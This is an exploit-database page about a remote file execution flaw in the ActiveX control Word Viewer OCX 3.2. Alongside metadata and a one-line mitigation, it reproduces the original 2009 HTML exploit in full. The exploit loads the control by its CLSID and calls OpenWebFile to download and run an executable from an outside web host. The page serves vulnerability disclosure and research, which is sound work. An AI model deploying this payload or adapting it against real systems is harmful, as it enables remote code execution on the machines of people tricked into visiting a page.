header-logo
Suggest Exploit
vendor:
Word Viewer OCX
by:
Mountassif Moad a.k.a Stack
9.3
CVSS
HIGH
Remote File execution
94
CWE
Product Name: Word Viewer OCX
Affected Version From: Word viewer OCX V 3.2
Affected Version To: Word viewer OCX V 3.2
Patch Exists: NO
Related CWE: N/A
CPE: a:microsoft:word_viewer_ocx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Word viewer OCX V 3.2 Remote File execution exploit

A vulnerability in Word viewer OCX V 3.2 allows remote attackers to execute arbitrary files via a crafted HTML page. The vulnerability is due to the OpenWebFile method of the ActiveX control, which can be called with a URL pointing to a malicious file. This can be exploited to execute arbitrary code by tricking a user into visiting a malicious web page.

Mitigation:

Disable the ActiveX control in the browser or use a third-party application firewall to block the malicious URL.
Source

Exploit-DB raw data:

<HTML>
---------------------------------------------------------- <br>
 Word viewer OCX V 3.2 Remote File execution exploit<br>
---------------------------------------------------------- <br>
-----------------------------------<br>
#  By Mountassif Moad a.k.a Stack #
-----------------------------------<br>
<!--
v4 Team & evil finger
Class OA
GUID: {97AF4A45-49BE-4485-9F55-91AB40F22BF2}
Number of Interfaces: 1
Default Interface: _DOA
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {97AF4A45-49BE-4485-9F55-91AB40F22BF2}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data 
IPersist Safe:  Safe for untrusted: caller,data 
IPStorage Safe:  Safe for untrusted: caller,data  -->
<title>Word viewer OCX V 3.2 Remote File execution exploit</title>
<BODY>
 <object id=Stack classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22BF2}"></object>
<SCRIPT>
function Do_it()
 {
   File = "http://monmaroc.com/calc.exe"
   Stack.OpenWebFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">
</body>
</HTML>

# milw0rm.com [2009-01-13]

Navigation

Suggest Exploit

Services By CQR